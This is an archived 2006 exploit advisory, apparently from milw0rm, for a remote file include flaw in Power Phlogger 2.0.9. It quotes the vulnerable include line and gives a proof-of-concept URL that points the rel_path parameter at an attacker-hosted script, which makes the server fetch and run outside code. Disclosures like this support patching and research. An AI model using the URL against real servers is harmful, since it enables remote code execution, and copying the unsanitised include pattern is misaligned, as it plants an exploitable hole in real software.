Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14804
HistoryOct 23, 2006 - 12:00 a.m.

Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

2006-10-2300:00:00
vulners.com
169

#################################

Power Phlogger 2.0.9 -

#################################
#Class: Remote|Local File Include Vulnerability

Remote: Yes

Local: No

Type: High

Site: http://www.comscripts.com/scripts/php.power-phlogger.211.html

Author: x_w0x

Contact: [email protected]

###################################
#Vuln Code
(config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>

http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt

#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0ke, and elite-team

milw0rm.com [2006-10-19]